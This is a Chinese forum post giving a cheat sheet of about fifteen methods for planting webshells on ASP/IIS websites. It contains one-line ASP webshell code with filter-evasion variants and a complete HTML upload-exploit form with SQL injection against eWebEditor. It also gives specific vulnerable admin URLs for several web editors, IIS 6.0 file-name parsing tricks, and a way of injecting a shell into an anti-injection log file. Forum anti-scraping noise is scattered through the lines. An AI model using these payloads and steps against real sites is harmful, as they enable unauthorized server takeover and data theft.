返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
) \: l/ o* A* m! |5 k# o6 e/ l9 a( v2 M/ F0 ^( B: A$ w! f
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp3 X  L9 w4 Z' P
# s; H+ p- A' \5 y
3.上传漏洞:
& _0 L; _  C( u0 L+ t8 o
5 u8 |( h. p# x4 B+ f" ?) T2 C9 M动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00' [# j$ F! {" ~( E7 v) ^! l

. ~, p; O% [! d- ~% {逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
' g8 ]5 f$ B; S" h- g" K/ O9 S5 T9 R+ A+ r7 a
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
' V5 Q6 L: d, Y7 j, Q然后在上传文件里面填要传的图片格式的ASP木马! \# r  T/ p6 a! S! Y' w
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
5 V( l  @4 n) d8 y- A9 i- _& N/ k4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传3 ^; P: G5 H4 Y) L  R5 z/ ~7 b; w% V

# C: c$ w+ o1 V( O' v<html>( Q/ c( S/ k' D2 s
<head>
& }9 ^5 |" o3 a, y- H  F<title>ewebeditor upload.asp上传利用</title>; {5 I) z% E3 ^8 Y
</head>9 y: h* W' M+ Y/ ]# R) S
<body>
2 w) O2 |9 {. V, P/ ~6 X, i2 s# C<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
* ~; s& w" H" k: ]& R% Q9 w<input type=file name=uploadfile size=100><br><br>
" Z# o' F) k. w<input type=submit value=Fuck>
, R7 e6 }& b$ ]</form>$ f7 t& I$ A, q2 O
</body>* o1 g$ y$ I1 d0 Y$ |0 L2 B, T' Y
</form>* }, g/ B& ]! A3 V% P0 p
</html># q% Y) S6 i* j3 y' o& ^4 [. p
7 h% I# i7 Q- Q/ _$ C+ U9 f2 ]9 |
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
* e3 N- Y# W1 I! z- \5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
( ?$ V( Z" E/ r- X8 {
+ C1 p) r. V* d利用windows2003解析。建立zjq.asp的文件夹
4 z( P3 Y3 U" @0 ~2 g
  F' c1 r, h4 |6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
/ z" b* b+ ~% f" f4 \3 O  P+ `) J. A+ [. G" s
7.cuteeditor:类似ewebeditor
5 ^7 Y% R7 h9 y/ d
1 Y( R1 z1 F( k8.htmleditor:同上# ~$ c2 ^% \; ~3 F

9 V0 G: W3 U- r& ~' n: k! ]9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
# y5 M+ n9 j- A/ q0 }* U
% B9 S6 C- r, _3 ?! i, n<%execute request("value")%><%'<% loop <%:%>
  `7 @8 M# a3 r9 @' f3 j( a% U/ G$ ]
<%'<% loop <%:%><%execute request("value")%>
: J! [" Z% q$ q7 O& b! Z5 \, P! P  K; l0 S
<%execute request("value")'<% loop <%:%>
3 m& \; h$ s- V9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
& b9 N! R0 P  y! v+ y
$ x: H6 U0 F' J" u9 u10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞: A, d" j2 I( R& a% O5 z8 L% o( J: Q
5 R, K7 i- p0 `4 `! }4 Y
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3( d: q" Q- r% I4 X2 D. F
2 k0 K: V' l, _
解析漏洞得到webshell
# Q: [: A, S- V$ b; ?: B; ]: L0 ~$ z6 A5 J0 v; F9 n# T# E' h
12.mssql差异备份,日志备份,前提需知道web路径! j4 k" _0 Q( A, [6 a
6 h' Z6 |5 R/ Z" O0 g5 w# [" L
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
# B, h9 {% s6 O) O: }7 p  V  _1 T
6 ]  I$ |! i( G  c: f14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell% e0 x8 X3 |+ M! Q' e) Z5 q

" |/ h4 c2 X$ v6 b/ x/ z4 V5 Z15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
5 ^( H+ [, ~1 t: ]  {, r  A4 N+ U) v9 I. _2 \. c
以上只是本人的一些拙见,并不完善,以后想到了再继续添加9 e: w" i% \6 ~  I
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

返回列表